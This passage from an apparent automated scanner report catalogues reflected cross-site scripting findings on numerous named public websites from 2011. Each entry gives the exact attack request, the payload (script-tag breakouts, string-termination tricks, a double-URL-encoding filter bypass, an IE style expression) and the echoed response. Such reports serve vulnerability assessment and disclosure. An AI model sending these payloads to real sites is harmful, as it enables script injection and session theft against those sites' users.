<title>Acne.org - Acne treatment and community</title>
<meta http-equi
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
// highlight the current menu root, with css .current-menu
$.fn.reverse = [].reverse;
$('#acne-menu a[href$=?c8ef7'-alert(1)-'876c9abe3b9=1]').parents('li').reverse().eq(0).addClass('current-menu')
});
</script>
...[SNIP]...

2.5. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actionext.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c1f2"><script>alert(1)</script>fc560b7b08b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?9c1f2"><script>alert(1)</script>fc560b7b08b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.actionext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 16:02:05 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.3.5
X-Powered-By: PHP/5.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 22467

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ActionEXT: how to ad
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6772046&c3=&c4=www.actionext.com/?9c1f2"><script>alert(1)</script>fc560b7b08b=1&c5=&c6=&c15=&cj=1" />
...[SNIP]...

2.6. http://www.actionext.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.actionext.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23d24"-alert(1)-"4a4ebe7a9a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?23d24"-alert(1)-"4a4ebe7a9a5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.actionext.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 16:02:06 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.3.5
X-Powered-By: PHP/5.3.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 22437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>ActionEXT: how to ad
...[SNIP]...
<script type="text/javascript">
// Note: it's important to keep these in separate script blocks
COMSCORE.beacon({
   c1: 2,
   c2: "6772046",
   c3: "",
   c4: "www.actionext.com/?23d24"-alert(1)-"4a4ebe7a9a5=1", // Replace this with the page URL that the site is on here, and also enter it into the <noscript>
...[SNIP]...

2.7. http://www.adoption.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adoption.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc391"><script>alert(1)</script>a33a5854b79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bc391"><script>alert(1)</script>a33a5854b79=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adoption.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:25:43 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8b PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Powered-By: ws02
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 105222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Adoption, International, Domes
...[SNIP]...
<input type="hidden" name="page" value="http://www.adoption.com/?bc391"><script>alert(1)</script>a33a5854b79=1" />
...[SNIP]...

2.8. http://www.adpost.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.adpost.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22c37"><script>alert(1)</script>1bc67eff4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?22c37"><script>alert(1)</script>1bc67eff4a3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adpost.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 15:50:56 GMT
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
<TITLE>Free Classifieds @ Adpost.com</TITLE>
<!Se
...[SNIP]...
<a href="javascript:window.external.AddFavorite('http://www.adpost.com/us/?22c37"><script>alert(1)</script>1bc67eff4a3=1', 'Adpost.com Classifieds - Free Classifieds ')">
...[SNIP]...

2.9. http://www.allsubs.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.allsubs.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b9fa"><script>alert(1)</script>02acd87532c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?1b9fa"><script>alert(1)</script>02acd87532c=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.allsubs.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 15:06:39 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=4c8473958dd8d871b582c1acf8a32785; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 40506


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir=>
<head>
<title>Subtitles - Di
...[SNIP]...
<a href="mailto:?subject=Check out this subtitles site&body=Check out this link :
                                                   http://www.allsubs.org/?1b9fa"><script>alert(1)</script>02acd87532c=1">
...[SNIP]...

2.10. http://www.arcamax.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.arcamax.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4cb6"><script>alert(1)</script>696fff07a83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c4cb6"><script>alert(1)</script>696fff07a83=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.arcamax.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:08:21 GMT
Server: Apache/2.2.3 (CentOS)
X-AMXFCGI: 24902
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31531

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Free newsletters,
...[SNIP]...
<a href="/cgi-bin/newsc4cb6"><script>alert(1)</script>696fff07a83=1#top">
...[SNIP]...

2.11. http://www.betus.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.betus.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b38"-alert(1)-"6a2e71f8eef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d7b38"-alert(1)-"6a2e71f8eef=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.betus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: currentlocation=/default.aspx?d7b38"-alert(1)-"6a2e71f8eef=1; domain=.betus.com; expires=Sun, 03-Apr-2011 15:49:22 GMT; path=/
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-SID: v02
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 15:49:22 GMT
Content-Length: 23286
ETag: "pv3faa38e497401f6e01083a57aaedaeb0"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10201.C11819.A6929.RA0.G2EC5.U98147D5F].[OT/html.OG/pages]
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Sports Betting
...[SNIP]...
<![CDATA[
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="www.betus.com/default.aspx?d7b38"-alert(1)-"6a2e71f8eef=1"
s.server="VM1-CERES02"
s.channel="Welcome"
s.pageType=""
s.prop1=""
s.prop2=""

/* E-commerce Variables */
s.campaign=""
s.state=""
s.zip=""
s.events=""
s.products=""
s.purchaseID=""

...[SNIP]...

2.12. http://www.biblestudytools.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.biblestudytools.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload beeb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebcc61a5957b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as beeb5"><script>alert(1)</script>bcc61a5957b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /?beeb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebcc61a5957b=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.biblestudytools.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ThemeUrl=http://www.biblestudytools.com; expires=Mon, 02-May-2011 15:04:49 GMT; path=/
Set-Cookie: Passage=TranslationCode=niv&SecondaryTranslationCode=niv; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: RecentTranslations=TranslationCode0=niv; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowStrongs=false; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowFootnotes=false; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowCrossRefs=false; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowRedLetter=false; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: OneVersePerLine=false; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowMyNotes=true; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowMyBookmarks=true; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
Set-Cookie: ShowMyTags=true; expires=Mon, 02-Apr-2012 15:04:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 15:04:49 GMT
Content-Length: 42098
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-// W3C// DTD XHTML 1.0 Transitional// EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://o
...[SNIP]...
<meta property="og:url" content="http://www.biblestudytools.com/default.aspx?beeb5"><script>alert(1)</script>bcc61a5957b=1" />
...[SNIP]...

2.13. http://www.blockbusterexpress.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.blockbusterexpress.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c35fa'-alert(1)-'6b6fbf09de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c35fa'-alert(1)-'6b6fbf09de4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.blockbusterexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: .BBXSESSION=AjI9ELaP10OJDa7acI23Jg==; expires=Sat, 02-Apr-2011 16:38:00 GMT; path=/; HttpOnly
Set-Cookie: .BBXSESS=AjI9ELaP10OJDa7acI23Jg==; path=/; HttpOnly
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 16:07:59 GMT
Content-Length: 23246


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"[]>
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_ctl00_ctl00_ctl00
...[SNIP]...
) {
    $.cookie("temp_register_email", jQuery.trim($("#txtWhatsNewEmailAddress").val()), { path: '/' });
    window.location.href = 'https://www.blockbusterexpress.com/signup/?ReturnUrl=%2f%3fc35fa'-alert(1)-'6b6fbf09de4%3d1';
    }
   
</script>
...[SNIP]...

2.14. http://www.boardofwisdom.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.boardofwisdom.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7be11"><script>alert(1)</script>df9138e0d1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7be11"><script>alert(1)</script>df9138e0d1a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.boardofwisdom.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:37:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 57174
Content-Type: text/html
Cache-control: private


<html>
<head><title>Highlights - Recently Added Quotes - 1 to 10</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="description" content="The best rece
...[SNIP]...
<input type=hidden name="fromquery" value="7be11"><script>alert(1)</script>df9138e0d1a=1">
...[SNIP]...

2.15. http://www.brainpop.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.brainpop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aca9"><script>alert(1)</script>955b95f7adb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5aca9"><script>alert(1)</script>955b95f7adb=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.brainpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Cache-Control: max-age=0, no-cache, no-store
Expires: now, 0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Sat, 02 Apr 2011 16:14:28 GMT
Content-Length: 24509
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html >
<head>
   <META HTTP-EQUIV="Content-Type" content="text/html; charset=UTF-8">
   <META name=
...[SNIP]...
<input type="hidden" id="refer" name="refer" value="/?5aca9"><script>alert(1)</script>955b95f7adb=1" />
...[SNIP]...

2.16. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chakpak.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 643b6"style%3d"x%3aexpression(alert(1))"fe964d8e6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 643b6"style="x:expression(alert(1))"fe964d8e6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?643b6"style%3d"x%3aexpression(alert(1))"fe964d8e6a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chakpak.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:25:36 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 56565


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
<script type='t
...[SNIP]...
<a href="/find/movies/?643b6"style="x:expression(alert(1))"fe964d8e6a=1">
...[SNIP]...

2.17. http://www.chakpak.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.chakpak.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f008'%3b3986bdcbcd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3f008';3986bdcbcd1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?3f008'%3b3986bdcbcd1=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.chakpak.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:26:10 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 48079


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
<script type='t
...[SNIP]...
dEmail() {
alertme182531890_submitAlert();
var val=document.getElementById('alertme182531890_email_id').value;
logServerFromClient('182531890|-1 eId: -1 eType: alert:SEARCH kw:?3f008';3986bdcbcd1=| email sent '+val);

}


function alertme182531890_isGoodEmail() {
var val=document.getElementById('alertme182531890_email_id').value;
if (val.match('@') && (val.match
...[SNIP]...

2.18. http://www.couponconnector.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.couponconnector.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e603f"><script>alert(1)</script>7d4e29b47fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e603f"><script>alert(1)</script>7d4e29b47fd=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.couponconnector.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:44:50 GMT
Server: Apache/2.2.0 (Fedora)
X-Powered-By: PHP/5.2.11
Content-Length: 69350
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<input type="hidden" name="page" value="/?e603f"><script>alert(1)</script>7d4e29b47fd=1">
...[SNIP]...

2.19. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curezone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dfe7"><script>alert(1)</script>59cde8d3ac6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6dfe7"><script>alert(1)</script>59cde8d3ac6=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curezone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 15:18:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Fri, 01 Apr 2011 22:38:50 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>

<meta name="google-site-verification" content="evYYGlmZv0RpFVdpbIvaUyQhlbgRCR0AAJcFrhpT69o" />


<meta http-equiv="expi
...[SNIP]...
<a href="http://www.curezone.com/default.asp?6dfe7"><script>alert(1)</script>59cde8d3ac6=1">
...[SNIP]...

2.20. http://www.curezone.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.curezone.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 94e09<script>alert(1)</script>45687e24cc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?94e09<script>alert(1)</script>45687e24cc0=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.curezone.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 15:18:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Fri, 01 Apr 2011 22:38:51 GMT
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>
<head>

<meta name="google-site-verification" content="evYYGlmZv0RpFVdpbIvaUyQhlbgRCR0AAJcFrhpT69o" />


<meta http-equiv="expi
...[SNIP]...
</script>45687e24cc0=1">http://www.curezone.com/default.asp?94e09<script>alert(1)</script>45687e24cc0=1</a>
...[SNIP]...

2.21. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dafont.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8016"><script>alert(1)</script>5e7327fdc12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b8016"><script>alert(1)</script>5e7327fdc12=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dafont.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:26:32 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 19424

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>dafont.com</title><meta name="description" content="Archive of freely downloadab
...[SNIP]...
<a href="/fr/?b8016"><script>alert(1)</script>5e7327fdc12=1">
...[SNIP]...

2.22. http://www.dafont.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dafont.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 31e15><script>alert(1)</script>168c4a55ca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?31e15><script>alert(1)</script>168c4a55ca4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dafont.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 15:26:33 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 17334

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>dafont.com</title><meta name="description" content="Archive of freely downloadab
...[SNIP]...
<div style="margin-left:140px;display:block;cursor:pointer;height:54px;background:#e6e6e6" OnClick=document.location.href="/?31e15><script>alert(1)</script>168c4a55ca4=1#top" class="tdn">
...[SNIP]...

2.23. http://www.dailystrength.org/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dailystrength.org
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21d7b"-alert(1)-"e44377d2817 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21d7b"-alert(1)-"e44377d2817=1 HTTP/1.1
